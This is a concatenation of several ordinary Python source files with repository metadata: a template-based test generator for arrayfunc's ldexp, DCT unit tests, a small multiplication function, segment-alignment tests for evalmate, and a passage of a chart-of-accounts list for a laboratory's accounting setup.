test_%(funclabel)s_basic_array_num_array_b4(self): """Test %(funclabel)s as *array-num-array* for basic function with matherrors=True and with array limit - Array code %(typelabel)s. """ for testval in [%(test_op_y)s]: with self.subTest(msg='Failed with parameter', testval = testval): data1 = array.array('%(typecode)s', [%(test_op_x)s]) dataout = array.array('%(typecode)s', [0]*len(data1)) limited = len(data1) // 2 pydataout = [%(pyoperator)s(x, testval) for x in data1] expected = pydataout[0:limited] + list(dataout)[limited:] arrayfunc.%(funcname)s(data1, testval, dataout, matherrors=True, maxlen=limited) for dataoutitem, expecteditem in zip(dataout, expected): # The behavour of assertEqual is modified by addTypeEqualityFunc. self.assertEqual(dataoutitem, expecteditem) ############################################################################## ''' # ============================================================================== # The template used to generate the tests for testing invalid parameter types. param_invalid_template = ''' ############################################################################## class %(funclabel)s_param_errors_%(typelabel)s(unittest.TestCase): """Test for invalid parameters. param_invalid_template """ ######################################################## def setUp(self): """Initialise. """ self.floatarray1 = array.array('%(typecode)s', [%(test_op_x)s]) self.floatarray2 = array.array('%(typecode)s', [x for (x,y) in zip(itertools.cycle([%(test_op_y)s]), self.floatarray1)]) arraysize = len(self.floatarray1) self.dataout = array.array('%(typecode)s', itertools.repeat(0.0, arraysize)) # Create some integer array equivalents. self.intarray1 = array.array('i', [int(x) for x in self.floatarray1]) self.intarray2 = array.array('i', [int(x) for x in self.floatarray2]) self.intdataout = array.array('i', [int(x) for x in self.dataout]) ######################################################## def test_%(funclabel)s_array_num_none_a1(self): """Test %(funclabel)s as *array-num-none* for integer array - Array code %(typelabel)s. """ for testfloat, testint in zip(self.floatarray2, self.intarray2): with self.subTest(msg='Failed with parameter', testfloat = testfloat): # Copy the array so we don't change the original data. floatarray1 = copy.copy(self.floatarray1) intarray1 = copy.copy(self.intarray1) # This version is expected to pass. arrayfunc.%(funcname)s(floatarray1, testint) # This is the actual test. with self.assertRaises(TypeError): arrayfunc.%(funcname)s(intarray1, testint) ######################################################## def test_%(funclabel)s_array_num_none_a2(self): """Test %(funclabel)s as *array-num-none* for float number - Array code %(typelabel)s. """ for testfloat, testint in zip(self.floatarray2, self.intarray2): with self.subTest(msg='Failed with parameter', testfloat = testfloat): # Copy the array so we don't change the original data. floatarray1 = copy.copy(self.floatarray1) # This version is expected to pass. arrayfunc.%(funcname)s(floatarray1, testint) floatarray1 = copy.copy(self.floatarray1) # This is the actual test. with self.assertRaises(TypeError): arrayfunc.%(funcname)s(floatarray1, testfloat) ######################################################## def test_%(funclabel)s_array_num_none_a3(self): """Test %(funclabel)s as *array-num-none* for integer number and array - Array code %(typelabel)s. """ for testfloat, testint in zip(self.floatarray2, self.intarray2): with self.subTest(msg='Failed with parameter', testfloat = testfloat): # Copy the array so we don't change the original data. floatarray1 = copy.copy(self.floatarray1) # This version is expected to pass. arrayfunc.%(funcname)s(floatarray1, testint) intarray1 = copy.copy(self.intarray1) # This is the actual test. with self.assertRaises(TypeError): arrayfunc.%(funcname)s(intarray1, testint) ######################################################## def test_%(funclabel)s_array_num_none_a4(self): """Test %(funclabel)s as *array-num-none* for matherrors='a' - Array code %(typelabel)s. """ # Copy the array so we don't change the original data. floatarray1 = copy.copy(self.floatarray1) testint = self.intarray1[0] # This version is expected to pass. arrayfunc.%(funcname)s(floatarray1, testint, matherrors=True) floatarray1 = copy.copy(self.floatarray1) # This is the actual test. with self.assertRaises(TypeError): arrayfunc.%(funcname)s(floatarray1, testint, matherrors='a') ######################################################## def test_%(funclabel)s_array_num_none_a5(self): """Test %(funclabel)s as *array-num-none* for maxlen='a' - Array code %(typelabel)s. """ # Copy the array so we don't change the original data. floatarray1 = copy.copy(self.floatarray1) testint = self.intarray1[0] testmaxlen = len(floatarray1) // 2 # This version is expected to pass. arrayfunc.%(funcname)s(floatarray1, testint, maxlen=testmaxlen) floatarray1 = copy.copy(self.floatarray1) # This is the actual test. with self.assertRaises(TypeError): arrayfunc.%(funcname)s(floatarray1, testint, maxlen='a') ######################################################## def test_%(funclabel)s_array_num_array_b1(self): """Test %(funclabel)s as *array-num-array* for integer array - Array code %(typelabel)s. """ for testfloat, testint in zip(self.floatarray2, self.intarray2): with self.subTest(msg='Failed with parameter', testfloat = testfloat): # Copy the array so we don't change the original data. floatarray1 = copy.copy(self.floatarray1) intarray1 = copy.copy(self.intarray1) # This version is expected to pass. arrayfunc.%(funcname)s(floatarray1, testint, self.dataout) # This is the actual test. with self.assertRaises(TypeError): arrayfunc.%(funcname)s(intarray1, testint, self.dataout) ######################################################## def test_%(funclabel)s_array_num_array_b2(self): """Test %(funclabel)s as *array-num-array* for float number - Array code %(typelabel)s. """ for testfloat, testint in zip(self.floatarray2, self.intarray2): with self.subTest(msg='Failed with parameter', testfloat = testfloat): # Copy the array so we don't change the original data. intarray1 = copy.copy(self.intarray1) # This version is expected to pass. arrayfunc.%(funcname)s(self.floatarray1, testint, self.dataout) # This is the actual test. with self.assertRaises(TypeError): arrayfunc.%(funcname)s(self.floatarray1, testfloat, self.dataout) ######################################################## def test_%(funclabel)s_array_num_array_b3(self): """Test %(funclabel)s as *array-num-array* for integer output array - Array code %(typelabel)s. """ for testint in self.intarray2: with self.subTest(msg='Failed with parameter', testint = testint): # Copy the array so we don't change the original data. floatarray1 = copy.copy(self.floatarray1) # This version is expected to pass. arrayfunc.%(funcname)s(floatarray1, testint, self.dataout) # This is the actual test. with self.assertRaises(TypeError): arrayfunc.%(funcname)s(floatarray1, testint, self.intdataout) ######################################################## def test_%(funclabel)s_array_num_array_b4(self): """Test %(funclabel)s as *array-num-array* for integer number and array - Array code %(typelabel)s. """ for testfloat, testint in zip(self.floatarray2, self.intarray2): with self.subTest(msg='Failed with parameter', testfloat = testfloat): # This version is expected to pass. arrayfunc.%(funcname)s(self.floatarray1, testint, self.dataout) # This is the actual test. with self.assertRaises(TypeError): arrayfunc.%(funcname)s(self.intarray1, testint, self.intdataout) ######################################################## def test_%(funclabel)s_array_num_array_b5(self): """Test %(funclabel)s as *array-num-array* for matherrors='a' - Array code %(typelabel)s. """ # Copy the array so we don't change the original data. floatarray1 = copy.copy(self.floatarray1) testint = self.intarray2[0] # This version is expected to pass. arrayfunc.%(funcname)s(floatarray1, testint, self.dataout, matherrors=True) floatarray1 = copy.copy(self.floatarray1) # This is the actual test. with self.assertRaises(TypeError): arrayfunc.%(funcname)s(floatarray1, testint, self.dataout, matherrors='a') ######################################################## def test_%(funclabel)s_array_num_array_b6(self): """Test %(funclabel)s as *array-num-array* for maxlen='a' - Array code %(typelabel)s. """ # Copy the array so we don't change the original data. floatarray1 = copy.copy(self.floatarray1) testint = self.intarray2[0] testmaxlen = len(floatarray1) // 2 # This version is expected to pass. arrayfunc.%(funcname)s(floatarray1, testint, self.dataout, maxlen=testmaxlen) floatarray1 = copy.copy(self.floatarray1) # This is the actual test. with self.assertRaises(TypeError): arrayfunc.%(funcname)s(floatarray1, testint, self.dataout, maxlen='a') ######################################################## def test_%(funclabel)s_array_num_array_c1(self): """Test %(funclabel)s as *array* for missing numeric parameter - Array code %(typelabel)s. """ with self.assertRaises(TypeError): arrayfunc.%(funcname)s(self.floatarray1) ######################################################## def test_%(funclabel)s_array_num_array_c2(self): """Test %(funclabel)s as *num* for missing array parameter - Array code %(typelabel)s. """ testint = self.intarray2[0] with self.assertRaises(TypeError): arrayfunc.%(funcname)s(testint) ######################################################## def test_%(funclabel)s_array_num_array_c3(self): """Test %(funclabel)s as *array* for missing numeric parameter with maxlen - Array code %(typelabel)s. """ testmaxlen = len(self.floatarray1) // 2 with self.assertRaises(TypeError): arrayfunc.%(funcname)s(self.floatarray1, maxlen=testmaxlen) ######################################################## def test_%(funclabel)s_array_num_array_c4(self): """Test %(funclabel)s as *num* for missing array parameter with maxlen - Array code %(typelabel)s. """ testmaxlen = len(self.floatarray1) // 2 testint = self.intarray2[0] with self.assertRaises(TypeError): arrayfunc.%(funcname)s(testint, maxlen=testmaxlen) ######################################################## def test_%(funclabel)s_no_params_d1(self): """Test %(funclabel)s with no parameters - Array code %(typelabel)s. """ with self.assertRaises(TypeError): arrayfunc.%(funcname)s() ############################################################################## ''' # ============================================================================== # The template used to generate the tests for nan, inf, -inf in data arrays # when exceptions are expected. nan_data_error_ldexp_template = ''' ############################################################################## class %(funclabel)s_%(errorlabel)s_errors_%(typelabel)s(unittest.TestCase): """Test for basic general function operation using parameter %(errordata)s. nan_data_error_ldexp_template """ ############################################################################## def FloatassertEqual(self, expecteditem, dataoutitem, msg=None): """This function is patched into assertEqual to allow testing for the floating point special values NaN, Inf, and -Inf. """ # NaN cannot be compared using normal means. if math.isnan(dataoutitem) and math.isnan(expecteditem): pass # Anything else can be compared normally. else: if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0): raise self.failureException('%%0.3f != %%0.3f' %% (expecteditem, dataoutitem)) ######################################################## def setUp(self): """Initialise. """ self.addTypeEqualityFunc(float, self.FloatassertEqual) self.dataok1 = array.array('%(typecode)s', [%(test_op_x)s]) arraysize = len(self.dataok1) self.dataout = array.array('%(typecode)s', itertools.repeat(0.0, arraysize)) self.errordata = array.array('%(typecode)s', [float('%(errordata)s')] * arraysize) self.expectedep = [%(pyoperator)s(x, y) for x,y in zip(self.errordata, itertools.cycle([%(test_op_y)s]))] ######################################################## def test_%(funclabel)s_%(errorlabel)s_array_num_none_a1(self): """Test %(funclabel)s as *array-num-none* for %(errordata)s - Array code %(typelabel)s. """ for testval in [%(test_op_y)s]: with self.subTest(msg='Failed with parameter', testval = testval): # Copy the array so we don't change the original data. dataok1 = copy.copy(self.dataok1) errordata = copy.copy(self.errordata) # This version is expected to pass. arrayfunc.%(funcname)s(dataok1, testval) # This is the actual test. with self.assertRaises(ArithmeticError): arrayfunc.%(funcname)s(errordata, testval) ######################################################## def test_%(funclabel)s_%(errorlabel)s_array_num_none_a2(self): """Test %(funclabel)s as *array-num-none* for %(errordata)s with error check off - Array code %(typelabel)s. """ for testval in [%(test_op_y)s]: with self.subTest(msg='Failed with parameter', testval = testval): # Copy the array so we don't change the original data. errordata = copy.copy(self.errordata) expectedep = [%(pyoperator)s(x, testval) for x in self.errordata] arrayfunc.%(funcname)s(errordata, testval, matherrors=True) for dataoutitem, expecteditem in zip(errordata, expectedep): # The behavour of assertEqual is modified by addTypeEqualityFunc. self.assertEqual(dataoutitem, expecteditem) ######################################################## def test_%(funclabel)s_%(errorlabel)s_array_num_array_b1(self): """Test %(funclabel)s as *array-num-array* for %(errordata)s - Array code %(typelabel)s. """ for testval in [%(test_op_y)s]: with self.subTest(msg='Failed with parameter', testval = testval): # Copy the array so we don't change the original data. dataok1 = copy.copy(self.dataok1) errordata = copy.copy(self.errordata) # This version is expected to pass. arrayfunc.%(funcname)s(dataok1, testval, self.dataout) # This is the actual test. with self.assertRaises(ArithmeticError): arrayfunc.%(funcname)s(errordata, testval, self.dataout) ######################################################## def test_%(funclabel)s_%(errorlabel)s_array_num_array_b2(self): """Test %(funclabel)s as *array-num-array* for %(errordata)s with error check off - Array code %(typelabel)s. """ for testval in [%(test_op_y)s]: with self.subTest(msg='Failed with parameter', testval = testval): expectedep = [%(pyoperator)s(x, testval) for x in self.errordata] arrayfunc.%(funcname)s(self.errordata, testval, self.dataout, matherrors=True) for dataoutitem, expecteditem in zip(self.dataout, expectedep): # The behavour of assertEqual is modified by addTypeEqualityFunc. self.assertEqual(dataoutitem, expecteditem) ############################################################################## ''' # ============================================================================== # ============================================================================== # These are all the test code templates. test_templates = {'test_template_ldexp' : test_template_ldexp, 'nan_data_error_ldexp_template' : nan_data_error_ldexp_template, } # ============================================================================== # Read in the op codes. opdata = codegen_common.ReadINI('affuncdata.ini') funcname = 'ldexp' func = opdata[funcname] # ============================================================================== # This defines the module name. modulename = 'arrayfunc' # Import the array module for testing. arrayimport = 'import array' filenamebase = 'test_' + funcname filename = filenamebase + '.py' headerdate = codegen_common.FormatHeaderData(filenamebase, '09-Dec-2017', funcname) # Add additional header data. headerdate['modulename'] = modulename headerdate['arrayimport'] = arrayimport # One function (one output file). with open(filename, 'w') as f: # The copyright header. f.write(codegen_common.HeaderTemplate % headerdate) # Check each array type. for functype in codegen_common.floatarrays: testtemplate = test_templates[func['test_op_templ']] # Basic tests. funcdata = {'funclabel' : funcname, 'funcname' : funcname, 'pyoperator' : func['pyoperator'], 'typelabel' : functype, 'typecode' : functype, 'test_op_x' : func['test_op_x'], 'test_op_y' : func['test_op_y']} f.write(testtemplate % funcdata) # Test for invalid parameters. One template should work for all # functions of this style. f.write(param_invalid_template % funcdata) # NaN, inf, -inf tests. funcdata = {'funclabel' : funcname, 'funcname' : funcname, 'pyoperator' : func['pyoperator'], 'typelabel' : functype, 'typecode' : functype, 'test_op_x' : func['test_op_x'], 'test_op_y' : func['test_op_y'], 'test_nan_default' : func['test_nan_default'] } # NaN testtemplate = test_templates[func['test_nan_data_template']] funcdata['errorlabel'] = 'NaN' funcdata['errordata'] = 'nan' f.write(testtemplate % funcdata) # inf testtemplate = test_templates[func['test_inf_data_template']] funcdata['errorlabel'] = 'inf' funcdata['errordata'] = 'inf' f.write(testtemplate % funcdata) # -inf testtemplate = test_templates[func['test_ninf_data_template']] funcdata['errorlabel'] = 'ninf' funcdata['errordata'] = '-inf' f.write(testtemplate % funcdata) f.write(codegen_common.testendtemplate % {'funcname' : funcname, 'testprefix' : 'af'}) # ==============================================================================

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8

d8af10573346c1eac87e8e03feda6b15961cf4ed

3,028

py

Python

tests/test_dct.py

tung44/janalysis

d7d8ba781dc55d1b7f87c852c4da947ae498da64

[ "MIT" ]

null

tests/test_dct.py

tung44/janalysis

d7d8ba781dc55d1b7f87c852c4da947ae498da64

[ "MIT" ]

null

tests/test_dct.py

tung44/janalysis

d7d8ba781dc55d1b7f87c852c4da947ae498da64

[ "MIT" ]

null

"""Test the DCT implementation.""" import numpy import scipy.fftpack from janalysis.dct import dct2, dct2_twod_orthonormal def test_dct2_simple(): """Tests the 1D version of the dct2.""" time_domain = [1, 1, 1, 1] expected = scipy.fftpack.dct(time_domain) actual = dct2(time_domain) numpy.testing.assert_array_almost_equal(actual, expected) def test_dct2_same_length(): """Tests the 1D version of the dct2 with n_point of equal length.""" time_domain = [1, 1, 1, 1] expected = scipy.fftpack.dct(time_domain) actual = dct2(time_domain, len(time_domain)) numpy.testing.assert_array_almost_equal(actual, expected) def test_dct2_smaller_length(): """Tests the 1D version of the dct2 with n_point less than input length.""" time_domain = [1, 1, 1, 1] expected = scipy.fftpack.dct(time_domain, n=3) actual = dct2(time_domain, 3) numpy.testing.assert_array_almost_equal(actual, expected) def test_dct2_bigger_length(): """Tests the 1D version of the dct2 with n_point greater than length.""" time_domain = [1, 1, 1, 1] expected = scipy.fftpack.dct(time_domain, n=8) actual = dct2(time_domain, 8) numpy.testing.assert_array_almost_equal(actual, expected) def test_twod_dct2_dc_square(): """Tests the 2d dct (orthonormalized) on a dc sequence.""" time_domain = numpy.array([[1, 1, 1, 1, 1, 1, 1, 1], [1, 1, 1, 1, 1, 1, 1, 1], [1, 1, 1, 1, 1, 1, 1, 1], [1, 1, 1, 1, 1, 1, 1, 1], [1, 1, 1, 1, 1, 1, 1, 1], [1, 1, 1, 1, 1, 1, 1, 1], [1, 1, 1, 1, 1, 1, 1, 1], [1, 1, 1, 1, 1, 1, 1, 1]]) expected = scipy.fftpack.dct(scipy.fftpack.dct(time_domain.T, norm='ortho') .T, norm='ortho') actual = dct2_twod_orthonormal(time_domain) numpy.testing.assert_array_almost_equal(actual, expected) def test_twod_dct2_smaller_square(): """Tests the 2d dct (orthonormalized).""" time_domain = numpy.array([[1, 2, 3, 4], [4, 3, 2, 1], [1, 2, 3, 4], [4, 3, 2, 1]]) expected = scipy.fftpack.dct(scipy.fftpack.dct(time_domain.T, norm='ortho') .T, norm='ortho') actual = dct2_twod_orthonormal(time_domain) numpy.testing.assert_array_almost_equal(actual, expected) def test_twod_dct2_non_square(): """Tests the 2d dct (orthonormalized).""" time_domain = numpy.array([[1, 2, 3], [4, 3, 2], [1, 2, 3], [4, 3, 2]]) expected = scipy.fftpack.dct(scipy.fftpack.dct(time_domain.T, norm='ortho') .T, norm='ortho') actual = dct2_twod_orthonormal(time_domain) numpy.testing.assert_array_almost_equal(actual, expected)

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null

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7

d8d84914c5ad6c9233ff5274ec3820fdd928c09f

180

py

Python

Weekly Assignments/Week 6/Week 6_support_files/m3.py

abhishekb101/Skill-Lync-Python-programming

306883da48cca0719beb96c3ee00ab89de9e2fb0

[ "MIT" ]

null

Weekly Assignments/Week 6/Week 6_support_files/m3.py

abhishekb101/Skill-Lync-Python-programming

306883da48cca0719beb96c3ee00ab89de9e2fb0

[ "MIT" ]

null

Weekly Assignments/Week 6/Week 6_support_files/m3.py

abhishekb101/Skill-Lync-Python-programming

306883da48cca0719beb96c3ee00ab89de9e2fb0

[ "MIT" ]

null

"""Calculating the result of multiplication between two numbers""" def f3(x, y): """ Returns the value of multiplication between two valid numbers """ return x * y

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null

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1

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1

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7

d8f92a25d3d693572dcb643c4959a385eabf92e7

9,614

py

Python

tests/alignment/test_segment.py

ynop/evalmate

0274eb79528cee42405778c539ae8f576a48efb4

[ "MIT" ]

2

2019-08-16T14:49:20.000Z

2020-11-15T18:33:33.000Z

tests/alignment/test_segment.py

ynop/evalmate

0274eb79528cee42405778c539ae8f576a48efb4

[ "MIT" ]

3

2018-12-06T14:33:30.000Z

2018-12-19T13:54:12.000Z

tests/alignment/test_segment.py

ynop/evalmate

0274eb79528cee42405778c539ae8f576a48efb4

[ "MIT" ]

null

from audiomate import annotations from evalmate import alignment class TestInvariantSegmentAligner: def test_align(self): ref = annotations.LabelList(labels=[ annotations.Label('a', 0, 3), annotations.Label('b', 3, 6), annotations.Label('c', 7, 10) ]) hyp = annotations.LabelList(labels=[ annotations.Label('a', 0, 3), annotations.Label('b', 4, 8), annotations.Label('c', 8, 10) ]) result = alignment.InvariantSegmentAligner().align(ref, hyp) assert len(result) == 6 segment = result[0] assert segment.start == 0 assert segment.end == 3 assert segment.ref == [annotations.Label('a', 0, 3)] assert segment.hyp == [annotations.Label('a', 0, 3)] segment = result[1] assert segment.start == 3 assert segment.end == 4 assert segment.ref == [annotations.Label('b', 3, 6)] assert segment.hyp == [] segment = result[2] assert segment.start == 4 assert segment.end == 6 assert segment.ref == [annotations.Label('b', 3, 6)] assert segment.hyp == [annotations.Label('b', 4, 8)] segment = result[3] assert segment.start == 6 assert segment.end == 7 assert segment.ref == [] assert segment.hyp == [annotations.Label('b', 4, 8)] segment = result[4] assert segment.start == 7 assert segment.end == 8 assert segment.ref == [annotations.Label('c', 7, 10)] assert segment.hyp == [annotations.Label('b', 4, 8)] segment = result[5] assert segment.start == 8 assert segment.end == 10 assert segment.ref == [annotations.Label('c', 7, 10)] assert segment.hyp == [annotations.Label('c', 8, 10)] def test_align_with_overlapping_labels(self): ref = annotations.LabelList(labels=[ annotations.Label('a', 0, 3), annotations.Label('b', 3, 6), annotations.Label('bx', 4, 5), annotations.Label('c', 7, 10) ]) hyp = annotations.LabelList(labels=[ annotations.Label('a', 0, 3), annotations.Label('b', 4, 8), annotations.Label('c', 8, 10), annotations.Label('cx', 9, 11) ]) result = alignment.InvariantSegmentAligner().align(ref, hyp) assert len(result) == 9 segment = result[0] assert segment.start == 0 assert segment.end == 3 assert segment.ref == [annotations.Label('a', 0, 3)] assert segment.hyp == [annotations.Label('a', 0, 3)] segment = result[1] assert segment.start == 3 assert segment.end == 4 assert segment.ref == [annotations.Label('b', 3, 6)] assert segment.hyp == [] segment = result[2] assert segment.start == 4 assert segment.end == 5 assert segment.ref == [annotations.Label('b', 3, 6), annotations.Label('bx', 4, 5)] assert segment.hyp == [annotations.Label('b', 4, 8)] segment = result[3] assert segment.start == 5 assert segment.end == 6 assert segment.ref == [annotations.Label('b', 3, 6)] assert segment.hyp == [annotations.Label('b', 4, 8)] segment = result[4] assert segment.start == 6 assert segment.end == 7 assert segment.ref == [] assert segment.hyp == [annotations.Label('b', 4, 8)] segment = result[5] assert segment.start == 7 assert segment.end == 8 assert segment.ref == [annotations.Label('c', 7, 10)] assert segment.hyp == [annotations.Label('b', 4, 8)] segment = result[6] assert segment.start == 8 assert segment.end == 9 assert segment.ref == [annotations.Label('c', 7, 10)] assert segment.hyp == [annotations.Label('c', 8, 10)] segment = result[7] assert segment.start == 9 assert segment.end == 10 assert segment.ref == [annotations.Label('c', 7, 10)] assert segment.hyp == [annotations.Label('c', 8, 10), annotations.Label('cx', 9, 11)] segment = result[8] assert segment.start == 10 assert segment.end == 11 assert segment.ref == [] assert segment.hyp == [annotations.Label('cx', 9, 11)] def test_align_with_empty_segments(self): ref = annotations.LabelList(labels=[ annotations.Label('a', 0, 3), annotations.Label('b', 4, 6), ]) hyp = annotations.LabelList(labels=[ annotations.Label('a', 0, 3), annotations.Label('c', 5, 8), ]) result = alignment.InvariantSegmentAligner().align(ref, hyp) assert len(result) == 5 segment = result[0] assert segment.start == 0 assert segment.end == 3 assert segment.ref == [annotations.Label('a', 0, 3)] assert segment.hyp == [annotations.Label('a', 0, 3)] segment = result[1] assert segment.start == 3 assert segment.end == 4 assert segment.ref == [] assert segment.hyp == [] segment = result[2] assert segment.start == 4 assert segment.end == 5 assert segment.ref == [annotations.Label('b', 4, 6)] assert segment.hyp == [] segment = result[3] assert segment.start == 5 assert segment.end == 6 assert segment.ref == [annotations.Label('b', 4, 6)] assert segment.hyp == [annotations.Label('c', 5, 8)] segment = result[4] assert segment.start == 6 assert segment.end == 8 assert segment.ref == [] assert segment.hyp == [annotations.Label('c', 5, 8)] def test_align_empty_ground_truth(self): ref = annotations.LabelList(labels=[ ]) hyp = annotations.LabelList(labels=[ annotations.Label('b', 4, 8) ]) result = alignment.InvariantSegmentAligner().align(ref, hyp) assert len(result) == 1 segment = result[0] assert segment.start == 4 assert segment.end == 8 assert segment.ref == [] assert segment.hyp == [annotations.Label('b', 4, 8)] def test_align_empty_hypothesis(self): ref = annotations.LabelList(labels=[ annotations.Label('b', 4, 8) ]) hyp = annotations.LabelList(labels=[ ]) result = alignment.InvariantSegmentAligner().align(ref, hyp) assert len(result) == 1 segment = result[0] assert segment.start == 4 assert segment.end == 8 assert segment.ref == [annotations.Label('b', 4, 8)] assert segment.hyp == [] def test_align_different_start(self): ref = annotations.LabelList(labels=[ annotations.Label('b', 4, 9) ]) hyp = annotations.LabelList(labels=[ annotations.Label('b', 2, 8) ]) result = alignment.InvariantSegmentAligner().align(ref, hyp) assert len(result) == 3 segment = result[0] assert segment.start == 2 assert segment.end == 4 assert segment.ref == [] assert segment.hyp == [annotations.Label('b', 2, 8)] segment = result[1] assert segment.start == 4 assert segment.end == 8 assert segment.ref == [annotations.Label('b', 4, 9)] assert segment.hyp == [annotations.Label('b', 2, 8)] segment = result[2] assert segment.start == 8 assert segment.end == 9 assert segment.ref == [annotations.Label('b', 4, 9)] assert segment.hyp == [] def test_create_event_list(self): ll_ref = annotations.LabelList(labels=[ annotations.Label('a', 0.89, 13.73), annotations.Label('a', 13.73, 17.49), annotations.Label('b', 17.49, 22.75) ]) ll_hyp = annotations.LabelList(labels=[ annotations.Label('b', 0.1, 1.656), annotations.Label('a', 1.656, 1.976), annotations.Label('b', 1.976, 3.896), annotations.Label('a', 3.896, 3.957) ]) events = alignment.InvariantSegmentAligner.create_event_list(ll_ref, ll_hyp, time_threshold=0.01) assert events[0] == (0.1, [(0.1, 'S', 1, annotations.Label('b', 0.1, 1.656))]) assert events[1] == (0.89, [(0.89, 'S', 0, annotations.Label('a', 0.89, 13.73))]) assert events[2] == (1.656, [(1.656, 'E', 1, annotations.Label('b', 0.1, 1.656)), (1.656, 'S', 1, annotations.Label('a', 1.656, 1.976))]) assert events[3] == (1.976, [(1.976, 'E', 1, annotations.Label('a', 1.656, 1.976)), (1.976, 'S', 1, annotations.Label('b', 1.976, 3.896))]) assert events[4] == (3.896, [(3.896, 'E', 1, annotations.Label('b', 1.976, 3.896)), (3.896, 'S', 1, annotations.Label('a', 3.896, 3.957))]) assert events[5] == (3.957, [(3.957, 'E', 1, annotations.Label('a', 3.896, 3.957))]) assert events[6] == (13.73, [(13.73, 'E', 0, annotations.Label('a', 0.89, 13.73)), (13.73, 'S', 0, annotations.Label('a', 13.73, 17.49))]) assert events[7] == (17.49, [(17.49, 'E', 0, annotations.Label('a', 13.73, 17.49)), (17.49, 'S', 0, annotations.Label('b', 17.49, 22.75))]) assert events[8] == (22.75, [(22.75, 'E', 0, annotations.Label('b', 17.49, 22.75))])

34.833333

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0.060189

0.25228

0.125364

0.066369

0.882399

0.859111

0.852513

0.807297

0.71667

0.672036

0

0.07356

0.302892

9,614

275

106

34.96

0.695315

0

0.739726

0

0.010506

0

0.525114

1

0.031963

false

0

0.009132

0

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1

0

1

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1

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null

0

1

0

9

2b0f2a6bc16028b51e605b1f05d5b33e47a3e168

115,579

py

Python

laboratorio/__init__.py

Lewinta/laboratorio

b8615a02591657c829c8e0378760d26bf8593c75

[ "MIT" ]

null

laboratorio/__init__.py

Lewinta/laboratorio

b8615a02591657c829c8e0378760d26bf8593c75

[ "MIT" ]

null

laboratorio/__init__.py

Lewinta/laboratorio

b8615a02591657c829c8e0378760d26bf8593c75

[ "MIT" ]

null

# -*- coding: utf-8 -*- from __future__ import unicode_literals __version__ = '0.0.1' account_list = [ { "name": "100000 - ACTIVOS - LB", "account_name": "ACTIVOS", "company": "Laboratorio Betalab", "parent_account": "", "account_number": "100000", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "110000 - ACTIVOS CORRIENTES - LB", "account_name": "ACTIVOS CORRIENTES", "company": "Laboratorio Betalab", "parent_account": "100000 - ACTIVOS - LB", "account_number": "110000", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "111000 - EFECTIVO EN CAJA Y BANCO - LB", "account_name": "EFECTIVO EN CAJA Y BANCO", "company": "Laboratorio Betalab", "parent_account": "110000 - ACTIVOS CORRIENTES - LB", "account_number": "111000", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Cash", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "111100 - CAJA GENERAL - LB", "account_name": "CAJA GENERAL", "company": "Laboratorio Betalab", "parent_account": "111000 - EFECTIVO EN CAJA Y BANCO - LB", "account_number": "111100", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Cash", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "111200 - CAJA CHICA - LB", "account_name": "CAJA CHICA", "company": "Laboratorio Betalab", "parent_account": "111000 - EFECTIVO EN CAJA Y BANCO - LB", "account_number": "111200", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Cash", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "111300 - EFECTIVO EN BANCOS - LB", "account_name": "EFECTIVO EN BANCOS", "company": "Laboratorio Betalab", "parent_account": "111000 - EFECTIVO EN CAJA Y BANCO - LB", "account_number": "111300", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Cash", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "111311 - BANCO BHD LEON - LB", "account_name": "BANCO BHD LEON", "company": "Laboratorio Betalab", "parent_account": "111300 - EFECTIVO EN BANCOS - LB", "account_number": "111311", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Bank", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "111312 - BANCO BANRESERVAS - LB", "account_name": "BANCO BANRESERVAS", "company": "Laboratorio Betalab", "parent_account": "111300 - EFECTIVO EN BANCOS - LB", "account_number": "111312", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Bank", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "111313 - Tarjetas de Credito - LB", "account_name": "Tarjetas de Credito", "company": "Laboratorio Betalab", "parent_account": "111300 - EFECTIVO EN BANCOS - LB", "account_number": "111313", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Bank", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "Fondos en ARS - LB", "account_name": "Fondos en ARS", "company": "Laboratorio Betalab", "parent_account": "111300 - EFECTIVO EN BANCOS - LB", "account_number": "", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Bank", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "111400 - EFECTIVO USD - LB", "account_name": "EFECTIVO USD", "company": "Laboratorio Betalab", "parent_account": "111000 - EFECTIVO EN CAJA Y BANCO - LB", "account_number": "111400", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "USD", "account_type": "Cash", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "111401 - CAJA USD - LB", "account_name": "CAJA USD", "company": "Laboratorio Betalab", "parent_account": "111400 - EFECTIVO USD - LB", "account_number": "111401", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "USD", "account_type": "Cash", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "111402 - PRIMA CAJA USD - LB", "account_name": "PRIMA CAJA USD", "company": "Laboratorio Betalab", "parent_account": "111400 - EFECTIVO USD - LB", "account_number": "111402", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", 